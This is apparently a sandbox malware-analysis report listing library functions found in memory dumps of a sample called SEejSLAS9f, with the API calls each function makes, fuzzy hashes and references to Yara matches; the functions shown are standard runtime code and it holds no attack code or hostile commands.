Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

pScheduler, xrefs: 00415DB2
version, xrefs: 00415D9F

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 024A5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 024A5B8A
__alldvrm.LIBCMT ref: 024A5D8B
__alldvrm.LIBCMT ref: 024A5DAD

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: df72fd2d1c62846be8c75fdec26bbffb4d4cd5b66c90d805d6ba129b5335aa4c
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 78A15972D013869FEB26CF28C9A57AEBBE1EF65314F58816FD5859B381C3348941CB50

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 024AFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024AFD9E

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: ed7d319149688fe1d7b3a0bbed2b2bc2aa4460cb3770df107cb724985efca93d
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: 3D41AF31A00600ABDB226FBE8C60BAF3B66EF31730F11061FF42AD66D0D77644458BA1

Function 024A6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024A047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024A6B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024A6BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024A6BEC
__freea.LIBCMT ref: 024A6BF5

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 93e2e34bc3baba9a00dc80a189d8fe73fa1c5d60f0dd9a58292053eb7113b7da
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: FA31D072A0121AABDF24CF65CC50DEF7BA9EF50714B0A426EEC14D7290EB35D951CB90

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 02499330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0249934A

Part of subcall function 02499297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024992C6
Part of subcall function 02499297: ___AdjustPointer.LIBCMT ref: 024992E1

_UnwindNestedFrames.LIBCMT ref: 0249935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02499370
CallCatchBlock.LIBVCRUNTIME ref: 02499398

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 498d1580d0e3659feca5257187e3c93cc0b12885d0de557d3f13b2bc4cda5061
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: EF01D772100148BBDF125E96CC41EEB7F6EEF48754F05441DFE5896120D776E861EBA0

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 024A5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378), ref: 024A51C8
GetLastError.KERNEL32(?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024A2213), ref: 024A51D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024A51E2

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 0ce62b76c3fdf1b0970068b8dd50a63813749d5e11aeb4b2c24ffea2a9e3c617
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 52017036E022226BD7214F789D54E777B98AF56F617500231FC05D7241C720C901CAE4

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 02496395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024963AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024963C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024963DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024963F3

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: d319f3877fd5d38c43cc6a368d3d55f140f1a849d9a8719ef83febf945162c43
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 7E018636600114BBCF26EEA5D854AAF7B9E9F45750F01005BEC21AB391DAB1ED11CAA0

Function 02492B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02492BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02492BCF

Part of subcall function 02488687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024886A8
Part of subcall function 02488687: Hash.LIBCMT ref: 024886E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02492BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02492BF8

Part of subcall function 0248F6DF: Hash.LIBCMT ref: 0248F6F1

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 9818fd9ac03129c5d6a493833d4a97d73fd284c24edb29e5508bc53965df0ce4
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: B8118E76410204AFCB15EF65C880ACAFBF9BF59320F014A5FE9568B551DBB0E904CBA0

Function 02492B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02492BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02492BCF

Part of subcall function 02488687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024886A8
Part of subcall function 02488687: Hash.LIBCMT ref: 024886E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02492BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02492BF8

Part of subcall function 0248F6DF: Hash.LIBCMT ref: 0248F6F1

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 3ec0b07585b12f697fd9bc3453e88e054a5cfdc7649a1191d919e1ccde2fc13a
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 33012976410604ABCB24EF66C881EDAF7E9FF48320F008A1EE55A87650DBB0F944CF60

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 024750CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 024750D1

Part of subcall function 0247BDAE: __EH_prolog3_GS.LIBCMT ref: 0247BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0247511C
__Getcoll.LIBCPMT ref: 0247512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0247513B

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 241021b39ed5283bc16d49de6027d1b95f759a6a168da68b97e6a5a38c3c5984
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: AA015371920208AFEB00EFA5C480BDDB7B1FF54316F50802ED465AB280CBB49988CF91

Function 02475B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02475B8D

Part of subcall function 0247BDAE: __EH_prolog3_GS.LIBCMT ref: 0247BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02475BD8
__Getcoll.LIBCPMT ref: 02475BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02475BF7

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 8d215c1775b953af9906a528ed44feb6b412121d06d2ac5772888c845cf6d0a3
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: B00165719102089FDB00EFA5C480BEDB7B1BF14319F10842FD469AF280CBB89988CF90

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 0248C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C1A4

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 9637257fbe7917bdb9b89250c74eea444ac72701f57a4c3a519b253b9b5d5a35
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 1D01EF3A024109ABDF1BAE94DCC18BE3B66AB29650F088417F91884120D332C6B1AEA1

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

